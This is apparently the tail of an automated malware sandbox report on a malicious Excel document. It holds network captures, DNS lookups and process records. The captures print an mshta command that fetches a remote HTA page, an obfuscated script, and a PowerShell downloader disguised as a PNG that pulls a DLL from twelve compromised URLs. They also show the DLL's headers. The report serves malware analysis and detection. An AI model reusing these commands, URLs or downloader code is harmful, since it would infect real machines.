                                    Jan 28, 2022 21:18:27.714525938 CET4916880192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:18:27.775736094 CET804916891.240.118.172192.168.2.22
                                    Jan 28, 2022 21:18:27.776531935 CET804916891.240.118.172192.168.2.22
                                    Jan 28, 2022 21:18:27.776552916 CET804916891.240.118.172192.168.2.22
                                    Jan 28, 2022 21:18:27.776639938 CET4916880192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:18:28.073252916 CET4916980192.168.2.22164.90.147.135
                                    Jan 28, 2022 21:18:31.093900919 CET4916980192.168.2.22164.90.147.135
                                    Jan 28, 2022 21:18:36.523542881 CET4916780192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:18:37.100416899 CET4916980192.168.2.22164.90.147.135
                                    Jan 28, 2022 21:18:49.211739063 CET4917080192.168.2.22103.206.244.105
                                    Jan 28, 2022 21:18:49.390794039 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.390885115 CET4917080192.168.2.22103.206.244.105
                                    Jan 28, 2022 21:18:49.391053915 CET4917080192.168.2.22103.206.244.105
                                    Jan 28, 2022 21:18:49.569916010 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.579858065 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.579883099 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.579899073 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.579916000 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.579920053 CET4917080192.168.2.22103.206.244.105
                                    Jan 28, 2022 21:18:49.579931974 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.579947948 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.579963923 CET4917080192.168.2.22103.206.244.105
                                    Jan 28, 2022 21:18:49.579963923 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.579981089 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.579983950 CET4917080192.168.2.22103.206.244.105
                                    Jan 28, 2022 21:18:49.579996109 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.580034971 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.580095053 CET4917080192.168.2.22103.206.244.105
                                    Jan 28, 2022 21:18:49.758980036 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.759012938 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.759037018 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.759037018 CET4917080192.168.2.22103.206.244.105
                                    Jan 28, 2022 21:18:49.759059906 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.759083033 CET4917080192.168.2.22103.206.244.105
                                    Jan 28, 2022 21:18:49.759083033 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.759107113 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.759114981 CET4917080192.168.2.22103.206.244.105
                                    Jan 28, 2022 21:18:49.759130001 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.759152889 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.759166956 CET4917080192.168.2.22103.206.244.105
                                    Jan 28, 2022 21:18:49.760771990 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.760798931 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.760818958 CET4917080192.168.2.22103.206.244.105
                                    Jan 28, 2022 21:18:49.760821104 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.760844946 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.760854959 CET4917080192.168.2.22103.206.244.105
                                    Jan 28, 2022 21:18:49.760869026 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.760891914 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.760900974 CET4917080192.168.2.22103.206.244.105
                                    Jan 28, 2022 21:18:49.760912895 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.760936022 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.760950089 CET4917080192.168.2.22103.206.244.105
                                    Jan 28, 2022 21:18:49.760957003 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.760979891 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.760994911 CET4917080192.168.2.22103.206.244.105
                                    Jan 28, 2022 21:18:49.938174009 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.938195944 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.938210011 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.938222885 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.938240051 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.938256979 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.938272953 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.938288927 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.938299894 CET4917080192.168.2.22103.206.244.105
                                    Jan 28, 2022 21:18:49.938303947 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.938322067 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.938335896 CET4917080192.168.2.22103.206.244.105
                                    Jan 28, 2022 21:18:49.938338995 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.938354969 CET8049170103.206.244.105192.168.2.22
                                    Jan 28, 2022 21:18:49.938357115 CET4917080192.168.2.22103.206.244.105
                                    Jan 28, 2022 21:18:49.938371897 CET8049170103.206.244.105192.168.2.22

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 28, 2022 21:18:27.823419094 CET5216753192.168.2.228.8.8.8
                                    Jan 28, 2022 21:18:28.062777996 CET53521678.8.8.8192.168.2.22
                                    Jan 28, 2022 21:18:49.192480087 CET5059153192.168.2.228.8.8.8
                                    Jan 28, 2022 21:18:49.210891008 CET53505918.8.8.8192.168.2.22

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Jan 28, 2022 21:18:27.823419094 CET192.168.2.228.8.8.80x7e8eStandard query (0)hostfeeling.comA (IP address)IN (0x0001)
                                    Jan 28, 2022 21:18:49.192480087 CET192.168.2.228.8.8.80xf8cfStandard query (0)jurnalpjf.lan.go.idA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Jan 28, 2022 21:18:28.062777996 CET8.8.8.8192.168.2.220x7e8eNo error (0)hostfeeling.com164.90.147.135A (IP address)IN (0x0001)
                                    Jan 28, 2022 21:18:49.210891008 CET8.8.8.8192.168.2.220xf8cfNo error (0)jurnalpjf.lan.go.id103.206.244.105A (IP address)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • 91.240.118.172
                                    • jurnalpjf.lan.go.id

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.224916791.240.118.17280C:\Windows\System32\mshta.exe
                                    TimestampkBytes transferredDirectionData
                                    Jan 28, 2022 21:18:21.887382984 CET0OUTGET /gg/ff/fe.html HTTP/1.1
                                    Accept: */*
                                    Accept-Language: en-US
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Host: 91.240.118.172
                                    Connection: Keep-Alive
                                    Jan 28, 2022 21:18:21.949342966 CET2INHTTP/1.1 200 OK
                                    Server: nginx/1.20.2
                                    Date: Fri, 28 Jan 2022 20:18:21 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 32 62 32 65 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 45 6d 75 6c 61 74 65 49 45 39 27 3e 3c 73 63 72 69 70 74 3e 6c 31 6c 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 7c 7c 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 3b 76 61 72 20 66 39 66 37 36 63 3d 74 72 75 65 3b 6c 6c 31 3d 64 6f 63 75 6d 65 6e 74 2e 6c 61 79 65 72 73 3b 6c 6c 6c 3d 77 69 6e 64 6f 77 2e 73 69 64 65 62 61 72 3b 66 39 66 37 36 63 3d 28 21 28 6c 31 6c 26 26 6c 6c 31 29 26 26 21 28 21 6c 31 6c 26 26 21 6c 6c 31 26 26 21 6c 6c 6c 29 29 3b 6c 5f 6c 6c 3d 6c 6f 63 61 74 69 6f 6e 2b 27 27 3b 6c 31 31 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 49 31 28 6c 31 49 29 7b 72 65 74 75 72 6e 20 6c 31 31 2e 69 6e 64 65 78 4f 66 28 6c 31 49 29 3e 30 3f 74 72 75 65 3a 66 61 6c 73 65 7d 3b 6c 49 49 3d 6c 49 31 28 27 6b 68 74 27 29 7c 6c 49 31 28 27 70 65 72 27 29 3b 66 39 66 37 36 63 7c 3d 6c 49 49 3b 7a 4c 50 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 27 30 46 44 27 3b 6d 59 32 4b 63 49 38 48 57 51 50 41 38 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 71 35 32 4c 69 36 36 38 4d 36 38 70 52 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 71 35 32 4c 69 36 36 38 4d 36 38 70 52 5b 30 5d 3d 27 25 36 44 5c 31 37 30 25 33 38 25 33 38 25 33 33 25 33 34 25 33 34 25 34 31 27 20 20 20 3b 6d 59 32 4b 63 49 38 48 57 51 50 41 38 5b 30 5d 3d 27 7f 3c 7f 21 7f 44 7f 4f 7f 43 7f 54 7f 59 7f 50 7f 45 7f 20 7f 68 7f 74 7f 6d 7f 6c 7f 20 7f 50 7f 55 7f 42 7f 4c 7f 49 7f 43 7f 20 7f 22 7f 2d 7f 2f 7f 2f 7f 57 7f 33 7f 43 7e 18 7f 44 7f 54 7f 44 7f 20 7f 58 7f 48 7f 54 7f 4d 7f 4c 7f 20 7f 31 7f 2e 7f 30 7f 20 7f 54 7f 72 7f 61 7f 6e 7f 73 7f 69 7f 74 7f 69 7f 6f 7f 6e 7f 61 7f 6c 7e 18 7f 45 7f 4e 7f 22 7e 15 7e 5c 6e 7f 74 7f 70 7f 3a 7e 18 7f 77 7e 42 7f 2e 7f 77 7f 33 7f 2e 7f 6f 7f 72 7f 67 7f 2f 7f 54 7f 52 7f 2f 7f 78 7e 5c 6e 7e 0c 7f 31 7f 2f 7e 1e 7f 44 7e 4e 7e 50 7f 6c 7f 31 7f 2d 7f 74 7e 2d 7e 2f 7e 31 7e 33 7e 35 7f 6c 7f 2e 7f 64 7f 74 7f 64 7f 22 7f 3e 7f 3c 7e 57 7f 20 7f 78 7e 0c 7e 2f 7f 3d 7f 22 7e 3d 7e 3f 7e 41 7e 43 7e 45 7e 47 7e 49 7f 2f 7f 31 7f 39 7e 79 7e 56 7e 0b 7f 6c 7e 66 7e 68 7f 65 7f 61 7f 64 7e 67 7f 73 7f 63 7f 72 7f 69 7f 70 7f 74 7f 3e 7f 65 7f 76 7e 36 7f 28 7f 75 7f 6e 7f 65 7d 04 7f 61 7f 70 7f 65 7f 28 7f 5c 27 7d 0c 7f 5c 5c 7f 31 7f 36 7f 32 7f 25 7f 32 7f 30 7d 19 7f 36 7f 31 7f 79 7f 25 7f 33 7f 37 7d 24 7f 44 7d 1d 7d 26 7f 32 7d 26 7f 33 7f 42 7d 20 7f 31 7d 19 7f 37 7f 31 7d 24 7f 38 7d 5c 27 7d 19 7f 32 7f 33 7f 25 7f 37 7f 34 7d 06 7d 19 7f 35 7f 36 7f 25 7f 36 7d 2a 7f 45 7f 66 7d 20 7f 32 7d 3e 7f 37 7f 6d 7f 43 7f 68 7d 41 7f 31 7f 72 7f 25 7f 34 7f 33 7d 48 7d 19 7f 34 7f 34 7f 65 7d 1d 7d 35 7f 33 7d 33 7f 33 7d 39 7f 32 7f 43 7d 24 7d 5b 7f 30 7d 1d 7f 39 7d 24 7f 42 7d 45 7f 31 7f 35 7f 37 7d 4f 7f 32 7d 35 7f 36 7d 64 7f 33 7d 28 7f 33 7d 62 7d 2d 7f 69 7d 24 7d 5f 7f
                                    Data Ascii: 2b2e<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';mY2KcI8HWQPA8=new Array();q52Li668M68pR=new Array();q52Li668M68pR[0]='%6D\170%38%38%33%34%34%41' ;mY2KcI8HWQPA8[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd"><~W x~~/="~=~?~A~C~E~G~I/19~y~V~l~f~head~gscript>ev~6(une}ape(\'}\\162%20}61y%37}$D}}&2}&3B} 1}71}$8}\'}23%74}}56%6}*Ef} 2}>7mCh}A1r%43}H}44e}}53}33}92C}$}[0}9}$B}E157}O2}56}d3}(3}b}-i}$}_


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.224916891.240.118.17280C:\Windows\System32\mshta.exe
                                    TimestampkBytes transferredDirectionData
                                    Jan 28, 2022 21:18:27.714525938 CET13OUTGET /gg/ff/fe.png HTTP/1.1
                                    Host: 91.240.118.172
                                    Connection: Keep-Alive
                                    Jan 28, 2022 21:18:27.776531935 CET14INHTTP/1.1 200 OK
                                    Server: nginx/1.20.2
                                    Date: Fri, 28 Jan 2022 20:18:27 GMT
                                    Content-Type: image/png
                                    Content-Length: 1199
                                    Connection: keep-alive
                                    Last-Modified: Fri, 28 Jan 2022 14:54:48 GMT
                                    ETag: "4af-5d6a59dbe5e00"
                                    Accept-Ranges: bytes
                                    Data Raw: 24 70 61 74 68 20 3d 20 22 43 7b 73 65 65 64 61 7d 3a 5c 50 72 7b 73 65 65 64 61 7d 6f 67 72 61 6d 44 7b 73 65 65 64 61 7d 61 74 61 5c 7b 73 65 65 64 61 7d 4a 6f 6f 53 65 65 2e 64 7b 73 65 65 64 61 7d 6c 6c 22 2e 72 65 70 6c 61 63 65 28 27 7b 73 65 65 64 61 7d 27 2c 27 27 29 3b 0d 0a 24 75 72 6c 31 20 3d 20 27 68 74 74 70 3a 2f 2f 68 6f 73 74 66 65 65 6c 69 6e 67 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 34 58 73 6a 74 4f 54 37 63 46 48 76 42 56 33 48 5a 2f 27 3b 0d 0a 24 75 72 6c 32 20 3d 20 27 68 74 74 70 3a 2f 2f 6a 75 72 6e 61 6c 70 6a 66 2e 6c 61 6e 2e 67 6f 2e 69 64 2f 61 73 73 65 74 73 2f 69 4d 2f 27 3b 0d 0a 24 75 72 6c 33 20 3d 20 27 68 74 74 70 3a 2f 2f 69 74 2d 6f 2e 62 69 7a 2f 62 69 74 72 69 78 2f 78 6f 44 64 44 65 2f 27 3b 0d 0a 24 75 72 6c 34 20 3d 20 27 68 74 74 70 3a 2f 2f 62 69 6d 65 73 61 72 61 79 65 6e 6f 76 69 6e 2e 69 72 2f 77 70 2d 61 64 6d 69 6e 2f 47 31 70 59 47 4c 2f 27 3b 0d 0a 24 75 72 6c 35 20 3d 20 27 68 74 74 70 3a 2f 2f 67 61 72 64 65 6e 69 6e 67 66 69 6c 6d 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 63 4d 56 55 59 44 51 33 71 2f 27 3b 0d 0a 24 75 72 6c 36 20 3d 20 27 68 74 74 70 3a 2f 2f 64 61 69 73 79 2e 73 75 6b 6f 62 75 72 75 2d 73 65 63 75 72 65 2e 63 6f 6d 2f 38 70 6c 6b 73 2f 76 38 6c 79 5a 54 65 2f 27 3b 0d 0a 24 75 72 6c 37 20 3d 20 27 68 74 74 70 73 3a 2f 2f 70 72 6f 70 65 72 74 79 2d 65 67 2e 63 6f 6d 2f 6d 6c 7a 6b 69 72 2f 39 37 76 2f 27 3b 0d 0a 24 75 72 6c 38 20 3d 20 27 68 74 74 70 3a 2f 2f 74 6f 74 61 6c 70 6c 61 79 74 75 78 74 6c 61 2e 63 6f 6d 2f 73 69 74 69 6f 2f 44 67 6b 74 4c 33 7a 64 2f 27 3b 0d 0a 24 75 72 6c 39 20 3d 20 27 68 74 74 70 3a 2f 2f 6d 61 78 74 64 65 76 65 6c 6f 70 65 72 2e 63 6f 6d 2f 6f 6b 77 39 79 78 2f 47 63 32 38 5a 58 2f 27 3b 0d 0a 24 75 72 6c 31 30 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 61 62 6c 72 2e 63 6f 6d 2f 65 6c 65 6e 63 74 69 63 2f 66 4d 46 74 52 72 62 73 45 58 31 67 58 75 33 5a 31 4d 2f 27 3b 0d 0a 24 75 72 6c 31 31 20 3d 20 27 68 74 74 70 3a 2f 2f 61 63 74 69 76 65 74 72 61 69 6e 69 6e 67 2e 73 79 74 65 73 2e 6e 65 74 2f 6c 69 62 72 61 72 69 65 73 2f 38 73 2f 27 3b 0d 0a 24 75 72 6c 31 32 20 3d 20 27 68 74 74 70 73 3a 2f 2f 67 75 64 61 6e 67 74 61 73 6f 72 69 63 68 69 6e 61 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 47 47 30 31 63 2f 27 3b 0d 0a 0d 0a 24 77 65 62 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 6e 65 74 2e 77 65 62 63 6c 69 65 6e 74 3b 0d 0a 24 75 72 6c 73 20 3d 20 22 24 75 72 6c 31 2c 24 75 72 6c 32 2c 24 75 72 6c 33 2c 24 75 72 6c 34 2c 24 75 72 6c 35 2c 24 75 72 6c 36 2c 24 75 72 6c 37 2c 24 75 72 6c 38 2c 24 75 72 6c 39 2c 24 75 72 6c 31 30 2c 24 75 72 6c 31 31 2c 24 75 72 6c 31 32 22 2e 73 70 6c 69 74 28 22 2c 22 29 3b 0d 0a 66 6f 72 65 61 63 68 20 28 24 75 72 6c 20 69 6e 20 24 75 72 6c 73 29 20 7b 0d 0a 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 24 77 65 62 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 24 75 72 6c 2c 20 24 70 61 74 68 29 3b 0d 0a 20 20 20 20 20 20 20 69 66 20 28 28 47 65 74 2d 49 74 65 6d 20 24 70 61 74 68 29 2e 4c 65 6e 67 74 68 20 2d 67 65 20 33 30 30 30 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 5b 44 69 61 67 6e 6f 73 74 69 63 73 2e 50 72 6f 63 65 73 73 5d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 3b 0d 0a 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 7d 0d
                                    Data Ascii: $path = "C{seeda}:\Pr{seeda}ogramD{seeda}ata\{seeda}JooSee.d{seeda}ll".replace('{seeda}','');$url1 = 'http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/';$url2 = 'http://jurnalpjf.lan.go.id/assets/iM/';$url3 = 'http://it-o.biz/bitrix/xoDdDe/';$url4 = 'http://bimesarayenovin.ir/wp-admin/G1pYGL/';$url5 = 'http://gardeningfilm.com/wp-content/pcMVUYDQ3q/';$url6 = 'http://daisy.sukoburu-secure.com/8plks/v8lyZTe/';$url7 = 'https://property-eg.com/mlzkir/97v/';$url8 = 'http://totalplaytuxtla.com/sitio/DgktL3zd/';$url9 = 'http://maxtdeveloper.com/okw9yx/Gc28ZX/';$url10 = 'http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/';$url11 = 'http://activetraining.sytes.net/libraries/8s/';$url12 = 'https://gudangtasorichina.com/wp-content/GG01c/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12".split(",");foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } }


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    2192.168.2.2249170103.206.244.10580C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampkBytes transferredDirectionData
                                    Jan 28, 2022 21:18:49.391053915 CET15OUTGET /assets/iM/ HTTP/1.1
                                    Host: jurnalpjf.lan.go.id
                                    Connection: Keep-Alive
                                    Jan 28, 2022 21:18:49.579858065 CET17INHTTP/1.1 200 OK
                                    Date: Fri, 28 Jan 2022 20:18:49 GMT
                                    Server: Apache/2.4.6 (CentOS) PHP/7.4.27
                                    X-Powered-By: PHP/7.4.27
                                    Set-Cookie: 61f44fa975c8c=1643401129; expires=Fri, 28-Jan-2022 20:19:49 GMT; Max-Age=60; path=/
                                    Cache-Control: no-cache, must-revalidate
                                    Pragma: no-cache
                                    Last-Modified: Fri, 28 Jan 2022 20:18:49 GMT
                                    Expires: Fri, 28 Jan 2022 20:18:49 GMT
                                    Content-Disposition: attachment; filename="KfCx9N.dll"
                                    Content-Transfer-Encoding: binary
                                    Content-Length: 548864
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: application/x-msdownload
                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hsa,2,2,22&2272,2226222222-22-22-2Rich,2PEL>a!P`@-R4PV0N@`@.text9EP `.rdata``@@.datae000@.rsrcPV``@@.relocb@B


                                    Statistics

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:21:18:18
                                    Start date:28/01/2022
                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                    Imagebase:0x13f7b0000
                                    File size:28253536 bytes
                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:2
                                    Start time:21:18:20
                                    Start date:28/01/2022
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
                                    Imagebase:0x4aa90000
                                    File size:345088 bytes
                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:4
                                    Start time:21:18:21
                                    Start date:28/01/2022
                                    Path:C:\Windows\System32\mshta.exe
                                    Wow64 process (32bit):false
                                    Commandline:mshta http://91.240.118.172/gg/ff/fe.html
                                    Imagebase:0x13fa50000
                                    File size:13824 bytes
                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:6
                                    Start time:21:18:24
                                    Start date:28/01/2022
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
